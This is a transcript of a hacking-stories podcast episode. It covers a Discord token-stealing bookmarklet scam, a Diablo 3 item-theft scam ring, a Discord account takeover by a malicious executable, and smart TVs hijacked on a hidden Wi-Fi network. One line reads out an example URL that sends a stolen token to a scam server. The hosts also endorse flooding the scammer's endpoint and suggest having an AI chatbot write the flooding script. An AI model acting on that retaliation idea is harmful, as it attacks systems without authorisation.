Hacked - Hotline Hacked Vol. 11
Episode Date: March 28, 2025Hacked Discord accounts, zombie emergency alerts on TV, and a crime spree in Diablo 3—just another day. As always, thanks for sharing your calls with us—we had a blast listening. Note: We menti...on and explain this in the episode, but we’ve pumped the brakes on the ads. Things got overstuffed—that’s on us. Thanks for the honest feedback. Got a strange tale of technology, security, or hacking? Share it at HotlineHacked.com. Hacked is brought to you by Push Security. Check them out at PushSecurity.com Learn more about your ad choices. Visit podcastchoices.com/adchoices
Transcript
Discussion (0)
Thank you for calling Hotline Hacked.
Share your strange tale of technology, true hack, or computer confession.
After the beep.
Greetings, sorry for the submission not being audio.
I don't want to reveal my voice, but I still have an interesting story to share.
I think it's more fair to let you two read it instead of using TTS.
Jokes on you. We use TTS anyway.
A friend of mine got fished and his Discord account was stolen.
What's really impressive is that there were four programmers.
looking at the screen while it happened, and no one suspected anything. How was this possible?
Turns out there is a really clever trick that very few people know about. So, he joined a Discord
server that required verification in a very unique way. He had to open a verification bot site,
which gave him instructions to drag a certain link to his Chrome bookmarks bar. Then he had to
click this bookmark while being in a tab with Discord open, it reloaded,
and he was in.
A half an hour later, his Discord server started advertising crypto scams.
Turns out that this link wasn't actually a link, but a script.
Yeah, I was going to pause and jump in and be like,
I wonder how much malicious JavaScript was embedded in that bookmark that they dragged out.
So I'm assuming that's where this is going.
It would seem a lot, but let's find out.
Let's find out together.
Chrome allows you to drag scripts to your book.
bookmarks bar and execute them by clicking, they call this bookmarklets.
The problem is that these scripts run in the same environment as the current tab, so they have
full access to web apps memory and can do whatever they want with it.
This particular script extracted the authentication token from Discord's memory and opened
a makeshift API link.
Something like HTTP colon slash-scam site.examptial.
sample slash API, question mark token equals 01234566789 to send it to the server.
I love this. I love that.
Just reading it out loud.
The TTS is showing us like a tempural structure.
So essentially what they're saying is that the JavaScript pulled the token out of the memory
and then jammed it into an API call, which sent the token back to the server.
When I learned about this, I created a simple Python script that opened a top.
of these API links from different IPs, and submitted random strings that looked like Discord
authentication tokens, hopefully disrupting the scam. A few days later, the verification site was gone,
though I have no idea if that's standard for scams, or I actually did something. This scam really
shows how important is it for cybersecurity to be informed about new technologies and various quirks,
and to never be 100% confident in your knowledge of tech. Anything that asks you to drag and
drop anything into your bookmarks is probably mucking with you.
Like we have so many ways to verify things these days, you know, double factor,
multi-factor authentication, sending you or texting you codes, like whatever that looks like.
That when something's like, hey, do you mind like putting this code into your browser and
executing it for me?
It's like, yeah, it's like you're probably screwing with something.
It's welcome to people.
Thank you for joining us.
It's the Colin Show where you can share your strange tale of technology,
true hack or computer confession.
If you want to share your story, go on over to hotlinehack.com.
Hotline hacked, brought to you by Push Security.
You're going to hear more about them later in the show.
But before we get to that, we got to dig into this caller's call.
Let's dig in.
Okay, so a friend got fished, their Discord credentials got stolen.
The part that was never really explained was the idea that this all occurred
while there were three programmers watching the screen.
I want to understand that situation more
because it sounds like maybe someone bumped into something
and then gathered everybody around to like watch and see what happened.
Like it almost had the vibe of an experiment,
but I can't figure out why you would let that happen
given that the fallout was your Discord server spamming crypto.
The thought that I have is that they were probably programming together
at university or something.
everybody's around. They're trying to get access to a Discord server to for some purpose, who knows, whether it be gaming, whether it be, you know, all the things people do on Discord these days, which is a lot.
So there was probably just a bunch of them around a single computer and they were just going through the verification steps really quickly. You know, there are a lot of verification systems on Discord these days. So just like ran into a new one that's like, oh, I got to do this weird thing. And it didn't trigger anybody's like, hey,
Maybe there's a reason why they're putting this in a bookmark
because it can execute to the code inside of the browser window
because if you click on the link,
it's going to run in the environment of opening a new window
and then boom, there's probably nothing's going to happen
because it needs to look for specific things in the memory.
So the fact that they had to put it in a bookmark
meant that when it executed it executed on the open tab,
which probably was the Discord,
which then gave it access to all.
of the information that was currently stored in the state of that tab.
Hmm.
Does that make sense?
I think so.
So a bookmarklet is different from a link in that it can run a little bit of code?
Sure, sure.
A link can also run code.
You can embed JavaScript in links on the websites.
But the difference is that the bookmark probably executes a JavaScript function.
Like imagine you wrote a small JavaScript function that replaced the word the with
and or something.
you could run that on any website by putting that JavaScript function and embedding it into a bookmark.
That makes sense?
Yeah, I think it does.
So essentially, if you open developer tools on a website, you can interact with the JavaScript
and interact with the website DOM entirely through the console.
It's a live living connection you have to it.
So you can jam in or type in or execute or import libraries of JavaScript and execute them
right from the developer tools of an open site.
So the difference between a link and a bookmark
is that the link, I'm assuming,
probably looks to open and execute that code
in a new tab or a new window
or a new sandbox.
Sure.
Where when it's a bookmark,
it probably interacts directly with the open tab
and the sandbox that it's living in.
Oh, and that's how they were able to extract
the authentication token.
Correct.
and get access to the account.
Huh.
So then on the back side of this,
this caller then decides to do a little bit of a fliper.
The old switcheroo,
they created a simple Python script to open a ton of these links.
And they said that a few days later,
the verification site was gone.
And they asked the very interesting question of, like,
did this deluge of traffic from their Python script
caused the creators of that spam bot site to take it down?
or is that natural churn
just part of how these things work?
You spin the spam side up,
you let it cook for a couple of days,
then you take it back down,
you move on over.
It's the many, many bank accounts
of the classical criminal enterprise,
but in URL form.
It sounds like this is me hypothesizing,
which I think we're used to here on this show.
But I would suspect that they kind of dossed them.
Like I would suspect that they wrote a,
wrote a Python script that sent,
in
hell yeah, hell yeah.
Rock on.
That they wrote a Python script
that sent in thousands of fake requests,
which essentially would jam up the logic.
It wouldn't jam up the logic,
but it would essentially make it fail
on thousands of entries in the database
because if you imagine it's building a database
of authentication keys
and then leveraging them to push out spam,
all of a sudden those authentication keys start failing.
And instead of getting like a 90% hit rate,
they're getting like a 0.09% hit.
rate. All of a sudden it's like, well, you know, now we got this headache. Plus they probably
were overrunning it. Like I would be if I was them. If we were looking to dose them, if they just
stole my thing and turned my Discord account into spam bot, I'd be looking to do to counter
attack, I guess. Yeah, sure. You want to get back at them. You want to, you and your three friends
that were watching your other friend get crypto spam bot hacked. You want a little satisfaction.
You open up any of your favorite AI chatbots these days and say, this is an API endpoint, make me a Python script that generates a random number and calls this.
API endpoint set authentication token equal to this and just do it infinitely amount of times.
And you do that off of four computers and all of a sudden there would be a million records at that spam bob endpoint that were garbage.
So the lesson here feels a little bit.
that like when you are clicking on a link, you're just going to URL.
Sure, bad stuff can happen, but the browser is still applying its usual security protections.
You can hover over a link and see where it's going.
And there's going to be an extra step to tricking you into executing some dodgy code.
If you drag a bookmark, a little bookmarklet, you're saving like executable, potentially like
JavaScript in your browser and you clicking it later could run the code on whatever page you're
currently on at that moment.
and that could execute a bunch of really dodgy, dodgy shit.
So that lesson is, if anything asks you to make it into a bookmark,
you should probably do a code review as to what you're bookmarking.
Okay.
There you go.
That's a surprisingly nice, clean, simple lesson from that call.
That a bookmarklet drag is a very different action than a link click.
That's good to know.
Yeah, link clicks can be malicious too, but like...
Sure.
Yeah, I would say that there's...
there's probably layers more security being applied,
as well as to have it execute the JavaScript in the same sandbox.
Like if you think of Chrome,
like essentially every tab you open is essentially an independent sandbox.
So to have a link that clicks that interacts with a specific sandbox
would be tougher than having you executing code in that sandbox,
which is what the bookmark click would do.
Learn something new every day, Scott.
That's the point of this show, Jordan, to educate Georgia.
Especially when you make a cybersecurity show and you do not come from that background.
You learn some stuff.
I love it.
Okay, before we move on to the next call, a quick comment about the ad volume.
A quick, quick word from your hosts.
Us.
So full transparency, we have put four mid-roll episode ad spots in the show since we started making it.
They don't always fill up, but it's always been four.
When we got offered what for us as like indie podcasters, the very exciting sponsorship deal,
we didn't correct for that.
So the effect was the episodes got kind of overstuffed with ads.
And no one likes it when a show that they like does that.
That's our bad.
So we're going to pump the brakes with the midroll ads and we're going to be more succinct
with our reads.
So by volume, it's more hanging out telling weird tech tales with your pals and less
clicking on that.
Let's just be frank here, 15 second skip button.
To everyone who took the time to message us or comment saying that we let it get off
track, thank you for taking the time to give some honest feedback.
And thank you for listening.
Jordan and I are, I would say, relatively selective in who we take on as sponsors.
Like we approve or decline.
We decline a lot of potential sponsors.
But we do approve some.
And there was some controversy about some.
some of our recent approvals.
All I'm going to say is erectile dysfunction is a real thing, and I'm okay with us advertising
the people that need that help.
We're going to keep our ad reads nice and clean and succinct, and we're just going to make
sure that there aren't too many of them, and we're going to keep trying to be thoughtful
about what we take on.
Appreciate you all.
Appreciate you all.
Thanks for listening.
And again, genuinely appreciate the honest feedback.
This is a story about Diablo 3 and the infamous era of the real money auction house.
When the game was first launched, Blizzard introduced a system that allowed players to trade in-game items for real currency.
Unlike shady third-party sites, the system was built right into the game and utilized PayPal for real cash transactions.
I love the start of this story already.
Yeah.
This was like the like when, when I don't know if you were.
you remember, but like when World of Warcraft and these things, all the virtual currencies,
like there used to be like essentially an index, like coin market cap, like the site that shows
you like what cryptos are worth. There was like versions of that for in-game currencies.
They like had real world value. That was like market supply demand commodity tract. So it's like
I just like where this is going as an economics tech geek. Did people ever short the
in game currency in those games? I don't know if they ever added derivatives to them.
their options.
That would have been awesome.
Maybe something we should just whip up as a fun game.
Sure.
If I've code it.
There was two types of currency.
Gold, the virtual in-game currency,
and United States dollars that could be cashed out
after Blizzard took their 15% cut.
When I first started,
I played the game legitimately.
I built up a decent character.
from scratch. At the time, the items were easy to find, still valuable since the market was
just getting started. You could sell a simple sword that you found, and after the 15% cut,
you would get 85 cents in your PayPal account. So I did this for a while, but it was just a
couple bucks for playing the game. One day, I joined a game to make a trade. Somebody was advertising
a hundred valuable stack of crafting reagents,
probably equal to $100 at the time,
but at a suspiciously low price.
They were offering it for $70.
And this is a commodity,
so it could be cashed out quite easily.
Is this turning into an arbitrage story
about how this guy wrote a bot to arbitrage,
people that posted things for below value?
It's starting to lean that way,
and I'm very intrigued.
Yeah, I like arbitrage.
So this again,
towing me further in. And you love Diablo, so it also, it's all coming together for you.
You know what, truthfully, dungeon crawlers don't do it for me. Don't tell anybody. I'll get some,
get some fire for it. I agreed to the amount of gold in the trade window and clicked accept.
So my side of the trade window lit up. Instead, I just got one. I was confused as to what was going on
here. When I just had one, the other guy basically said, hey, you want to know how it works
because I just got scammed out of 199 items. What was interesting about this script was that
you would click accept on your side of the window for when they had 100, and then they could
click accept after and only give you one. So it was something broken with the game, and it wasn't
like I miss saw the screen. So I'm like, yeah, I want to know what the heck's going on. So we got into a
Skype chat. What, what a thing to be like scammed and the immediate response is like,
ha ha, I scammed you. Want to see how I did it? Yeah, you want to see? Yeah, it's, it's, it's,
you can really only do that when you're scamming someone on the internet. Like, if you, if a pool shark
does that, they're going to get hit with a pool cue. The, it's totally. The,
I feel like a system,
I feel like this was the foundation
where like in-game trading and stuff
required like an escrow house
to like to settle things out
to make sure that this never happened again.
But let's keep listening.
I don't think they were chatting, but they were typing to me.
They passed me an AU3 file.
Non-executable.
But it was still kind of sketchy.
And I just kind of hanged around asking them
pretending like it didn't work
or luckily it didn't run it
because later I found out that when
you ran the script, it would make you drop all your items in the game. Basically, click on the
screen, drag the item to the outside and drop it in the game. And then they would pick up the item.
So like, hey, you want to figure out how I scammed? Do you also run this thing that's going to
scam you even harder? Yeah. It feels like this is barreling towards an even larger scam.
And it's like, oh, he like lured him out with the worm of want to see how I did this. He lured him out
with the worm of do you want to buy $100 gold for $70?
And then a subsequent worm of do you want to see how I did it?
And this call still has many minutes left on it.
So I'm curious how many like Russian nesting dolls of grift this thing goes.
Well, the thing, well, like, the thing I'm waiting for is the turn because I'm assuming
this person fights back at some point.
Let's find out.
So quickly I kind of realized, oh, this is what they're doing.
I was young at the time.
So I didn't really have a moral compass.
So I started kind of doing it myself and that script, the other one where it gave one instead of a hundred of the item, became publicly available online.
So you do it to people or show people it even because eventually people kind of knew that that was out there.
So they wouldn't trade, but you basically show it to them and then go, hey, you can do this too, but you have to give me 10% of whatever you make.
and then instead of giving them that script,
you would give them the script that makes them drop all their stuff
and you'd sell other things
and you'd go after characters in the game that were high-ranked.
So they've created a pyramid scheme of fraud inside of Diablo 3,
but in fact, just like with the Discord one,
to try and verify yourself onto the server,
you're actually just dumping all your stuff and giving it to them.
So it's a scam.
Yeah, I thought they'd created a pyramid scheme,
but it sounds like they didn't even create a pyramid.
scheme. They said, we've got this bomb-ass pyramid scheme. And then when you like, I don't know,
walk into the pyramid, they're like, we're just kidding. We're just going to beat you up and take your
stuff. We're taking all that gold. You could look up high-ranked characters and then kind of go after
them. And a character could be worth $500 of items at the time. So you could imagine kind of how
lucrative this could be. Not that this was good or I can condone it.
any of this. So one day I met someone kind of doing the same scheme, but he took it to the next level.
I believe his name was like demand demand or something. So if you're there, if you're listening,
I'd love to chat again. But anyways, this guy was taking it to the next level.
If you're listening, I'd love to hang out, miss you, bud.
I really like the idea that hotline hacked could become a like missed connections for cyber.
crime. You're like, I saw you on the subway. I saw you on the Discord server. Our eyes locked across
the Diablo gold grift in 2012. You just seemed special to me. I stole your, I'm the guy from the
Discord server that stole your Ethereum, wondering what you're up to you these days.
What a joint a pyramid scheme. It was a joint a pyramid scheme. Sick. I ended up becoming the recruiter,
finding players who were eager to kind of, there was various different things where you'd set up,
And one of them was people that wanted to run magic find runs.
It was a popular in-game activity where you'd switch to different gear at the very end to maximize the drops in the game.
But anyways, it was something that you could basically convince people.
You'd be like, hey, our friend who's amazing, who's about to join the game, it would be the three of us, meet a man and the target.
And you'd run with four people.
and you'd be like, we're waiting for this guy.
But the magic fine gear was such that you would have to have, the whole group would do it,
and then all of you would get better drops.
So we're using this script to swap our gear, and we'd show them like, you got to run this script too.
And eventually we'd get them to run it, and damn, Andaman would just kind of come in at the last moment.
I would get these people warmed up and this one would, man, he had it where I never saw the thing,
but they were connecting to some sort of server and then damn Andaman, we'd see him in game and he'd
send the command to make them drop all their stuff. He was pretty fair about the whole thing,
but he had multiple people finding people for him, I think, and I was just one of those people.
One time I just remember I had my sound loud and the game.
guy on Skype heard all of his items dropping and started to panic. I don't particularly feel good
about that instance. Once again, I was young and would not do this now. But of course, this couldn't
last forever. Blizzard eventually caught on and accounts started getting banned. That was part of
the reason why like demandman was having such issues, I think too. And why he needed people to recruit
because, yeah, getting to max level to be able to do this took a while, I started asking my friends
for their accounts and offering them $100 to let me use their characters. And then eventually I got
down to like my last character. And I told demandman, if this account gets banned, can you give me
something? And he was like, yeah, I'll give you something, whatever. And to this guy's credit,
like he could have just ditched me and like he gave me uh i can't remember what it was but he gave
me compensation for like getting my last character band um and uh i you know then i would get other
characters i think at some point but eventually came to the end when like the real money auction
house just like closed entirely and they'd implemented like trade warnings and a whole bunch of things
to make it harder to exploit during the peak of it
I think I was making $3,600 a month. I remember definitely days where I would skip work to do this
because I would make more money doing this than going to work. And looking back on it, I don't
feel good about it, but I'll tell you, it was definitely thrilling at the time. They could get
that gear back from contacting Blizzard and getting their items restored.
but I mean they would lose games of day play in the meantime so yeah that's my story hope you enjoyed it
there's a lot to unpack there mostly I'm curious who demand demand was this like wraith-like
oliver twist with the gang of young naredwells running around doing crimes for him figure was
here's here's a better thing is that I know a pretty senior programmer who goes by
The moniker of that.
No way.
Yeah.
So I was like, IRL?
I just pulled up his Instagram and was like, could this have been you?
Maybe it was.
Offline.
I'm curious about the spelling because every time the caller said it, it was slightly different.
It was slightly different.
It was slightly different.
Oh, there's a lot to unpack there.
So organized crime.
Yeah.
Diablo 3, 2012, 12, $4,000 a month as like a thug
in the gang.
Yep.
Thrilling, as I'm sure most crime is.
Yeah, I'm intrigued by the escalation of it.
So they start out, they get compromised,
they get invited into the hack.
They realize that the invitation to the hack is itself a hack.
They then start doing that whole thing,
that whole pipeline themselves.
And they come across this demonstration.
man-demand figure that offers them this even larger grift of, okay, you're going to take an
account, you're going to form a party, you're going to get all these people into a little community.
It's like a long con and then we're going to do this. It sounds like some kind of a script that gets
people to drop items. I didn't quite catch how mechanically that would work. Yeah, so I'm not knowing
Diablo 3 at all. I have no idea I would work, but it sounds like they refined it to the point
where it was, it would take over your screen,
show you like a realistic loading screen,
but in the background,
it was like iterating through your characters,
spawning them in world, dumping their inventory,
changing characters, spawning in world, dumping their inventory.
So it's like, doesn't matter which character you were partied up with,
it would just start cycling through all their characters,
dumping everyone's inventory.
Hmm.
And then it became like a loop pool of like, hey, I'm going to take the sword and you can take
the shield.
And like, what do you want?
We're going to divvy up all the goods that we got after we.
Sure.
So this person is staring at this loading screen, probably still chatting with them in-game
chatter and Discord like watching or whatever.
Actually, 2012 it wouldn't even have been Discord.
It would have been like one of those early, you know, game chat systems.
Like a forum or something, yeah.
No, no.
there was like a pre-discord there was like a really crappy version of discord i'm trying
what it's called i ran on the side of a game and let you chat with everybody just like you talk
to everybody yeah exactly yeah um anyway but it sounds like they really got into like mass
steery and then some honor among thieves moment at the bitter end where he goes to demand
and says if my last account like i'm just getting they're starting to lock this down if my last
account gets banned, will you help me? Will you give me something for the riches I've made you?
Because he's making $3,600 a month, and he's one of these many merry bands of thugs.
Presumably, D'Man de Man was even doing better. And yeah, the demand a man did him right.
Hey, it's like the organized crime when the mafia pays your legal bills when you can finally get
charged. Totally. You finally got out of prison. You got a slick situation waiting for you.
Yeah. I remember reading about Diablo 3's economy. I've never played Diablo.
three. But I remember reading about it. A few years ago, I was working on like a small multiplayer indie
game and just going down the rabbit hole of learning about those economies, it is like kind of a
cautionary tale. Diablo 2 had a big black market. And I think in Diablo 3, they wanted to
legitimize that black market. And so to capture all of those transactions, there's like a security
argument to be made, but there's also just a like, hey, if people are going to be making a,
a ton of money by selling stuff in this game.
And it's happening on the black market.
We want our cut.
And it's widely considered like a cautionary tale in that games have since been monetized
in that way to within an inch of their life.
But it was sort of the first instance of that attempt at monetization breaking the
core loop of the game and starting to bias people towards feeling more like a customer
and less like a person going on an adventure.
Since then, a lot of games have fallen into that trap.
But I think it's widely considered like a little bit of a caution.
And that's why they pumped the brakes on it.
They've changed it based on pretty big backlash.
So the thing for me is like the current games, like pay to win is pretty rare,
like where you can buy like O.P guns or swords or whatever.
Like I feel like they've, I feel like they tried that, then that got pushed back because
people were like, no.
People just don't want to play that game.
It's not a fun experience to just get wrecked by someone because they were willing to spend
more than you. Exactly. We're like something like, I'm assuming Diablo and like World
of Warcraft and some of these other games, we're like, if you committed the time to like mine
all the ore and spend 70 real human hours doing absolutely nothing except for game productivity stuff,
you could generate one of these like mystical items which gave you a benefit. And it's like,
okay, like you worked for it, you deserve it. And then it became like the, this thing has a real value.
and somebody who's like, I want to pay to win.
I don't want to spend 70 hours like mining ore and collecting fairy dust to generate this magical shield.
So it's like, it's really tough.
I can see how they got there from like the game designer perspective being like, you know what?
You know what's better than loop boxes?
I was just taking 15% of the cut from everybody.
Yeah, totally.
It's like ticket master.
Ticket master does that.
100%.
And like there's something intuitive about it at the outset.
People pay money for games because games are fun.
The thing that's fun typically about games normally has something to do with friction.
You have to grind through something.
You have to wait for that random reward inside of the box.
There's a little bit of struggle so that when it happens, it feels good.
You've achieved something.
You can circumvent that with money and you get sort of a pale limitation of the feel good.
But in the end, if the money comes from making people have fun and giving you money isn't fun,
you've broken the core loop of these whole things.
And now we're at the,
there's so much more maturity
in the way these systems are designed
where it's like, we need to onboard you
with legitimate fun gameplay.
I'm talking about good games,
not the candy crush whales.
But like, we need to onboard you with the fun.
I mean, the shots fired,
but, and then there can be a layer of monetization underneath it.
Yeah, well, you're seeing like that,
we're off track here.
We're no longer talking about hacking Diablo,
but like the aesthetics,
have become such a big thing.
Like most of these micro transactions are around just simple in-game aesthetics.
I'll take that.
Yeah, same.
I can work with that.
It's like somebody wants to pay 12 bucks.
Yeah, somebody wants to pay 12 bucks to wear a different cape in this open world game.
Like, I don't care.
Like, good for them.
Great.
As long as that.
Support the devs.
Exactly.
That cape doesn't come with like a god mode.
God mode.
Yeah, exactly.
Where like I actually still like the old school, like World of Warcraft, like grinding.
grinding either
resource capturing
or grinding
going through massive dungeons
to acquire like what were they called?
Come on why how am I slipping on this?
You're talking about like a raid?
Yeah, raids.
Doing massive raids with the like
hope of getting the like 25%
or 10% drop at the end
and it's like 13 of you go in
and like one thing has a 10% chance of dropping
and you spent three hours like perfecting
like fighting this raid out so that you might be able to get something.
Like I like that.
It's a fun loop.
Yeah, it's a fun.
And I also like the fact that it's like,
and if you like get one of those drops,
you can share it, sell it, do whatever with it.
I still like that too.
I just needs to figure out how to balance that in the real world.
Because if some candy crush whale starts playing Diablo
and wants to spend $300 to buy that shield
rather than to level up a character,
level up gameplay capabilities,
and get to the point where they can earn that shield.
Like, I get that.
Like, you know, our economy and society is full of ways to bypass roadblocks with money.
Almost exclusively, you might say.
Like, why would a game be any different?
Yeah.
Well, I mean, on the flip side, if I'm not grinding to earn points that can be converted
back into a cryptocurrency and have the potential of creating an entire cottage industry
of people working under me to make me money,
me, why am I even playing for fun?
Go to hell.
There's a really interesting
side story to all this where it's like
income distribution globally
where like grinding resources in
in some of these games,
these online multiplayer games,
became like a job in countries
where the GDP was really low.
So if the average earned hourly rate was really low,
you could be mining gold
in Malaysia and selling it
in the United States for like what would be considered cheap in the states for the amount of
productivity required to get it. But in Malaysia was like an insane hourly work wage. So it's like
you started seeing like internet cafes across like Asia and Africa like filling up with people
who were like grinding in games specifically to sell things to first world countries to then
leverage that like it was a job. And it like paid really well. And it's like to me that's kind of a
cool thing where it's like something that has, I guess, you know, we talk about wasted utility
and maybe that's an argument for it. That might be the purest expression of wasted
utility if it being honest. It does create like a potential for an icky incentive. I remember I'm
not going to name it right now, but there was a video game. It kind of blew up in about 2021.
And it was the one that I was referring to with the with the crypto thing where in order to monetize
the game effectively, you needed a specific account with a specific type of crypto asset attached to
it that cost a certain amount of money. So all the people in those, exactly, all the people in
those emerging economies that wanted to play the game didn't have the initial capital so they
would have to go to someone. And it was almost like a taxi token type allegory of like, oh,
you want to play this game for money. You got to pay a rent to me because I have the account
that is monetized. And people would build these giant funnels.
of just people grinding at a game.
And the game's valuation skyrocketed.
It was sort of like championed as play to earn.
Like it was people loved that.
And yet at the base level,
there didn't seem to be anyone playing this thing for fun.
There was just this toil for digital,
like financial output system going on.
And it was like,
that's fascinating.
We covered that with Zeke in Zeke's interview.
Yeah.
Yeah.
Yeah, I don't know why I'm not saying the name of the game.
Maxi Infinity.
But yeah, we covered that extant.
Yeah, we sure did.
Yeah.
Anyway, I think we should take it over to the ad oasis.
Let's kick it over to some ads.
And when we get back to the other side, we got a couple more calls for you, friends.
We talk a lot about tools, you know, on and off the air.
Some clever, some feel like solutions in search of problems.
But every now and then something shows up that just makes sense for big corporations.
Push security is that kind of tool.
Identity attacks, fishing, credential stuffing, session hijacking, account takeovers.
These are the number one causes of breaches right now.
Most security tools still focus on endpoints, networks, infrastructure.
And meanwhile, the browser, the actual place where people work, has been mostly ignored.
And push changes that.
They built a lightweight browser extension that observes identity activity in real time.
It gives the organization visibility into how identities are being used.
Like when logins skip multi-factor authentication,
or when passwords are being reused,
or when somebody unknowingly enters credentials
into a spoofed login page.
Then, when something risky is detected,
push enforces protections right there in the browser,
no waiting, no help desk tickets.
It's visibility and control directly at the identity layer.
It's not just about prevention.
Push also monitors for real-time threats,
adversary in the middle attacks, stolen session tokens,
even newer techniques like cross-IDP impersonation,
where an attacker bypasses SSO,
and MFA by registering their own identity provider.
If you think about it, it's kind of like endpoint detection response, but for the browser.
And the team behind it, all offensive security pros, they publish really interesting research
in identity attacks, like the SaaS attack matrix, which breaks down exactly how these
kind of threats bypass traditional controls.
You know, identity is the new endpoint, and push is treating it that way.
Check them out at pushsecurity.com.
That's pushsecurity.com.
Hey, guys. My name's Cody.
this is a bit of an interesting tale
similar to the Discord hack
from the first episode of Hotline Hacks
that you guys did which was
fantastic by the way
I unfortunately
wound up falling for one of the
classic scams where
they ask you to test a game
they're using a friend's account
it looks very trustworthy
I ran the executable that I downloaded
and that gave them a door into my Discord information,
which they then proceeded to use to take over.
However, I actually noticed what was happening.
I was still logged in at the time that they were trying to take over my account.
So I actually wound up fighting back,
and once I realized that they had a...
effectively written a script that ran with this executable and placed a file into my computer,
my ancient, regardless of how much I changed it, I turned my computer off, changed everything from
my phone offline, started it back up, removed the files, and actually wound up having a
conversation with the hacker.
While they were determined to try and scam a bunch of money out of people,
asking for like 50 bucks and he would leave me and my friend alone.
I told them where to buy PayPal and it didn't work.
PayPal notified me and blocked the transaction.
I wound up getting the account back without any help from Discord.
I do not know.
And Discord does not seemingly have anyone answering.
Very much for the show, guys.
Keep it up and take care from a number.
another fellow Albertan.
Oh, wow.
Hey.
Home town boy.
Welcome from the Rockies.
Thanks for the call, Cody.
Really appreciate it.
I like that we're two for two on Discord revenge story calls.
This is turning into a PSA for Discord.
People on Discord are not trustworthy.
Do not do anything they say and definitely do not execute anything they give you from Hotline Act.
Yeah.
We'll leave that on the website, just sort of lingering there.
like a little safety advisor for people.
So this person's discord gets hacked.
They notice it's happening while it's happening.
They're still logged in.
And so this person decides to just yoink the cable out of the wall.
Very dramatic, very movie moment.
The computer boots down.
They rip over to their phone that the hacker doesn't have access to.
They change all of their login credentials on all of those different accounts that were in one fell swoop all
compromised by the compromise access to the system.
They then go back over to the computer, turn it back on.
Take it offline.
Take it offline.
Pull the Ethernet jack out of the back.
Well, no, it seems like it was still online because they go back over and they're having
a car.
Well, I guess they could have done that on their phone.
I think, yeah, I think like to clean up all the files, the injections that it had left,
I think he said that he took it offline, which means like just like disconnected
from the internet to make sure that if anything's running.
Like a really good idea.
Smart.
Yeah, the number one way to stop a lot.
lot of like network-based attacks is to just rip the network off.
Yeah, sure.
So at some point after that, he reconnects to the internet and resumes this conversation
with this Discord hacker who was friends with him.
That's how we got them, him to run the script.
No, no, no, no, no.
He was having a conversation, we've got a misinterpretation between the two of us here.
It sounds like he finally gets his, cleans his stuff up, changes his cred, gets back
online, and is talking to his friend's account that the hacker is in the,
inside of.
Oh.
So his friend got duped at the same time.
Oh, that's even better.
It just didn't clean it up.
So his,
he's talking to the hacker
who is like essentially masquerading
as his friend.
Oh, it's spooky.
So your friend messages you.
Oh, I like that.
And then we get the like real
Pieste duissance of this whole bad boy,
which is that this was,
I'm going to go ahead and say a teenager
who was trying to drum up $50 for a new gaming PC.
probably probably you had jipity write them like some authentication token extractor and was looking at ways to to leverage it into money oh no just wanted 50 bucks got told to stuff it tried to hit the old PayPal that is a scary moment like we had this conversation like I'm gonna keep referencing the interview with Adam because it's like we talked about a lot of good stuff in there but like discord is essentially a website right like you can load it up in a web browser or
Rudd's fine. If you download the app, the app is literally just like essentially a wrapper for Chrome.
So it's like interacting with Discord is very easy and like I would say accessible programming.
Like you're not really interacting with compiled code and pulling stuff out of like actual memory addresses and things like that.
You can interact with it through like TypeScript and JavaScript, which is like pretty accessible and very easy to code with any form of AI helper.
Yeah.
So I think it's just like really highlighting some of the security vulnerabilities and trust.
Again, this guy sounds like he was hoping on getting some beta version of a game
or something that he wanted early access to.
And he pushed his trust aside to, you know, hopefully get a larger return of like dopamine
from like getting something early.
And it just led to what probably was like a stressful and furious, you know,
afternoon. Yeah. He, the like speed in which he just recognized, okay, they're in the system,
so I'm going to turn it off. I'm going to immediately go change all of those credentials. And then when I
come back, I'm going to disconnect from the internet, clean all this crap out. And then I can go have
a conversation with my friends account being puppeted by the person that just hacked me for $50.
It's great. It's a good, it's a good, good little yarn. The, uh, yeah, the, the, the,
Like, whenever I hear stories like this, I'm just so thankful it wasn't like, like, bit lock or something.
Like, something that was like, it's like, oh, yeah, they got into my, I ran this executable and I like turned the power off on my computer as my hard drive was being encrypted in front of my face.
And I was going to be like ransomware it up.
Yeah, sure.
So I'm at least it was only like, oh, we grabbed, like, I'm sure it took him a long time to go and reset passwords to all of his accounts, you know.
Yeah.
Good, good argument for a password manager there.
Yeah, seriously.
but yeah.
Fascinating one.
Anyway, local boy too.
Local boy.
Keeping Discord locked down in Berta.
Hello,
I'm listening to your show,
and I've really been enjoying it,
and I've just lived in episode four
and figured this might be a fun one for you guys.
It's kind of a small story,
but I was at an exposition
last year for Ham Radio, actually,
and it was a fun exposition.
I love those things,
lots of smart people there.
From where my booth was,
was a little restaurant.
They had a bunch of TVs.
It had a bunch of, part of the demo.
Logged into that one.
Nice them as the TV, all the TVs that were on.
So I looked on there, and I kind of didn't see anything interesting, but then I had an idea.
It found a, uh, what's going on.
You know, it was like a minute of spending, but we're doing the show guys, really
enjoying that episode.
Well, thanks for listening.
Yeah, we appreciate it.
Thanks for calling in with the story.
I love a ham rate, an amateur radio aficionado, which for anyone that doesn't know,
that's what ham radio is.
Um, I love me some conference hijinks.
totally I think that's that's like the the bane of DefCon is the conference
hijinks like just make such an infrastructure impact yeah the the amount of so worried about
it warning that you get before you go there about turning off all the devices I'm
curious everything you have it's like lock it down turn off all the every radio
antenna well this is a good PSA because there's a lot of people out there I think that
think if they check the you know hidden SSID like it's non-broadcasting like when you
open up say you're on like Windows
or Mac and you look at like networks around you, you can opt out of that list, but it doesn't
mean that your Wi-Fi doesn't exist.
Right.
It takes very few seconds and not even like a hardcore tool to find all of those hidden SSIDs.
So especially if you've got one that's unencrypted, unlocked down, open, you're just asking
for invaders.
Thankfully, it was just a bunch of smart TVs that I think he mentioned that he
updated them, right?
I think you said that YouTube had to update before he could work.
So YouTube would have had to have run a little update on the televisions before it would have.
So he actually maintained their equipment.
You did them a favor.
So the fun conference hijinks, I do think that that is like a good, like if we're making a PSA out of each one of these calls, the one there is like do not, if you're hiding your SSID and you think that's some.
form of security, it is not security against the people that you need to be worried about.
Might be security against your neighbor, like jumping on or trying to like get on it to like
download stuff.
Yeah, sure.
But it's not going to prevent anybody that knows anything about anything.
But in this, in this analog, and correct me if I'm wrong here, it isn't stopping the network,
it isn't making the network more or less secure, just stopping it from being advertised.
Theoretically, that network should have still had some kind of password on it.
that stops the person from connecting to the smart TV.
So maybe it was, that's a weird overlap of things where like it's unprotected,
but we've removed the SSID so that it's hidden.
It's like, oh, that's, it's like you left the door wide unlocked,
but good luck finding it.
It's like, oh, it's quite easy to find this door in this analogy.
But when you kind of set up a bunch of TVs and you need to tell your staff
